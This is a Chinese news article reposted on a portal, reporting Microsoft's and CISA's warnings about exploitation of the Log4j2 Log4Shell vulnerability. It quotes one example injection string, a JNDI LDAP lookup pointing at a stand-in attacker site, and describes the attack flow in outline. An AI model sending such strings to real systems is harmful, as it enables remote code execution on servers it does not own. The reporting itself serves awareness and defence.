网易首页 > 网易号 > 正文 申请入驻

微软警告比SolarWinds影响更深远的Log4j2漏洞利用

0
分享至

微软再次发出了来自具有深厚背景的黑客组织的网络攻击预警,可知问题源于 Java 日志库的 Log4j2 漏洞(CVE-2021-44228)。这家雷德蒙德科技巨头指出,世界多地的黑客已开始利用这项更复杂的日志协议技术,来远程访问受害者的设备。目前观察到的大部分攻击,主要涉及各路人马的大规模扫描。

据悉,微软旗下的多个威胁情报团队 —— 包括 MSTIC 威胁情报中心、 Microsoft 365 Defender 威胁情报团队、RiskIQ 和 DART 检测响应团队 —— 一直在密切关注 Apache Log4j2 的远程代码执行(RCE)漏洞。

CVE-2021-44228 漏洞披露公告指出,被称作“Log4Shell”的漏洞攻击,往往在 Web 日志请求中包含如下字符串:

${jndi:ldap://[attacker site]/a}

美国网络安全和基础设施安全局(CISA)也证实了微软的说法,此前该机构同样通报了 Log4Shell 漏洞的广泛利用。

CISA 负责人 Jen Easterly 于昨日接受 CNN 采访时重申,若不迅速采取补救措施,各个联邦机构的设备、服务、乃至整个互联网,都将处于一个相当可怕的境地。

微软警告称,Log4j2 的风险源于两个方面。其一是漏洞可被轻松利用,其二是基于其构建的产品数量 —— 而 Apache Log4j2 就是当前最流行的 Java 日志库之一。

据悉,日志库用于为开发者提供有关服务和产品的附加信息,允许其控制在应用程序执行期间、用户登录特定服务 / 设备的错误报告,并在遇到功能问题时收集相关数据。

通过日志库的使用,开发者还可深入了解或收集设备详情,包括 CPU 类型 / GPU 型号、驱动程序版本、以及系统内存等。

攻击者会对使用 Log4j2 生成日志的目标系统执行 HTTP 请求,该日志利用 JNDI 向攻击者控制的站点执行请求,最终导致被利用的进程访问站点并执行有效负载。

在许多观察到的案例中,攻击者往往拿到了 DNS 日志系统的参数,旨在记录对站点的请求、以对易受攻击的系统进行指纹识别。

此前已知的一种漏洞利用,涉及微软旗下的《我的世界》服务器。攻击者以聊天框作为中部署的消息内容作为管道,试图渗透用户系统并夺得控制权。

事实上,全球许多知名企业都面临着巨大的风险,其中不乏微软、Twitter、苹果、亚马逊、百度、Cloudflare、网易、Cloudflare 等科技巨头。

网络安全公司 Check Point 指出,截至目前,其 GitHub 项目的下载量已经超过 40 万次。遗憾的是,尽管 Apache 已经发布了一个修补程序,但各家公司的实施方案不尽相同。

对于数百上千万的客户来说,这意味着他们仍将在未来一段时间里面临 Log4j 入侵风险,或导致大量用户数据暴露于在外。

特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

相关推荐
热点推荐
央媒曝光毒尿不湿!已流窜全国各地,无数婴儿中招,生殖系统受损

央媒曝光毒尿不湿!已流窜全国各地,无数婴儿中招,生殖系统受损

哄动一时啊
2026-06-18 19:27:04
梅洛尼:只要我还是总理,意大利军事基地的使用协议就不能被违反

梅洛尼:只要我还是总理,意大利军事基地的使用协议就不能被违反

别让往昔的悲伤和对未来的恐惧
2026-06-21 11:20:31
不以为耻?40岁前国脚爆料:我们曾在决赛前打游戏到凌晨3点

不以为耻?40岁前国脚爆料:我们曾在决赛前打游戏到凌晨3点

茜子足球
2026-06-20 23:26:30
建国后外逃级别最高的贪官!至今未落网,23年来逃跑方式仍是谜

建国后外逃级别最高的贪官!至今未落网,23年来逃跑方式仍是谜

铁血江湖人
2026-04-23 22:21:26
流浪26年满身污垢的沈巍,如今身价百万还有小15岁女友,他凭的啥

流浪26年满身污垢的沈巍,如今身价百万还有小15岁女友,他凭的啥

从零到一研究所
2026-06-18 16:15:07
华为正式宣布!这批老机型停更!快看看你中招了没有?

华为正式宣布!这批老机型停更!快看看你中招了没有?

小柱解说游戏
2026-06-20 15:51:54
5-1!4-0!F组全乱了,日本主帅真敢说,英媒猛夸,突尼斯骂自己

5-1!4-0!F组全乱了,日本主帅真敢说,英媒猛夸,突尼斯骂自己

萌兰聊个球
2026-06-21 16:22:32
47岁的秦海璐:每月给丧子丧夫的婆婆生活费,以后我就是您亲女儿

47岁的秦海璐:每月给丧子丧夫的婆婆生活费,以后我就是您亲女儿

林雁飞
2026-06-20 14:25:44
西方越想越怕,中方所有军演预案,都在练单挑全世界

西方越想越怕,中方所有军演预案,都在练单挑全世界

了舞天下
2026-06-17 17:57:55
陈奕迅4亿买2套豪宅

陈奕迅4亿买2套豪宅

地产微资讯
2026-06-21 15:13:30
今秋发布!微软正式官宣Windows 11 26H2:2分钟完成更新、硬件要求没变化

今秋发布!微软正式官宣Windows 11 26H2:2分钟完成更新、硬件要求没变化

快科技
2026-06-21 08:56:32
外资银行,集中发声!

外资银行,集中发声!

证券时报
2026-06-21 16:22:03
公开辟谣!哈珀父亲否认向马刺索要首发:位置是靠自己打出来的

公开辟谣!哈珀父亲否认向马刺索要首发:位置是靠自己打出来的

罗说NBA
2026-06-21 08:34:11
霍启山被曝大婚,娜然过往争议言论被扒,郭晶晶态度已经说明一切

霍启山被曝大婚,娜然过往争议言论被扒,郭晶晶态度已经说明一切

杜鱂手工制作
2026-06-21 17:48:21
46岁马琳现状:定居北京,广州有房,是在读博士,开马巴赫上下班

46岁马琳现状:定居北京,广州有房,是在读博士,开马巴赫上下班

洲洲影视娱评
2026-06-21 19:19:38
2026世界杯最富球星是谁?他年收近百亿!

2026世界杯最富球星是谁?他年收近百亿!

ChicMyGeek
2026-06-21 19:23:04
退休金分4个等级,能挤进第四档的老人,才叫真正的赢家

退休金分4个等级,能挤进第四档的老人,才叫真正的赢家

小影的娱乐
2026-06-20 16:24:10
毒纸尿裤爆料专家连夜改口!一份被逼签署的声明,撕开最肮脏真相

毒纸尿裤爆料专家连夜改口!一份被逼签署的声明,撕开最肮脏真相

菁菁子衿
2026-06-20 10:36:36
小沈阳女儿沈佳润,彻底翻车了,跟李雪琴聊天,前言不搭后语

小沈阳女儿沈佳润,彻底翻车了,跟李雪琴聊天,前言不搭后语

西楼知趣杂谈
2026-06-18 16:38:47
不愧是法国总统!马克龙:我已对特朗普挑明,现在主要是对付中国

不愧是法国总统!马克龙:我已对特朗普挑明,现在主要是对付中国

阿龙聊军事
2026-06-21 11:10:29
2026-06-21 20:24:49
cnBeta.COM incentive-icons
cnBeta.COM
提供IT行业即时资讯
68766文章数 70215关注度
往期回顾 全部

科技要闻

马斯克拿下7800亿元天价薪酬 2028年可兑现

头条要闻

媒体:两大核武国家“水仗”升级 巴基斯坦陷入恐慌

头条要闻

媒体:两大核武国家“水仗”升级 巴基斯坦陷入恐慌

体育要闻

德国的超级替补,10年前还在工厂上班

娱乐要闻

原来她就是张颂文老婆

财经要闻

蔚来的“暗战”时刻

汽车要闻

惊出冷汗!重庆实测奥迪A5L,华为智驾这波操作绝了…

态度原创

房产
家居
健康
旅游
本地

房产要闻

商业清零式退潮,大量住宅登场!三亚又要大规模调规!

家居要闻

绿意盎然 自然之境

吃粽子的3条保胃法则,消化科医生推荐

旅游要闻

河南:多彩民俗迎端午 沉浸体验活力足丨乐享端午

本地新闻

龙腾资江 韵动邵阳

无障碍浏览 进入关怀版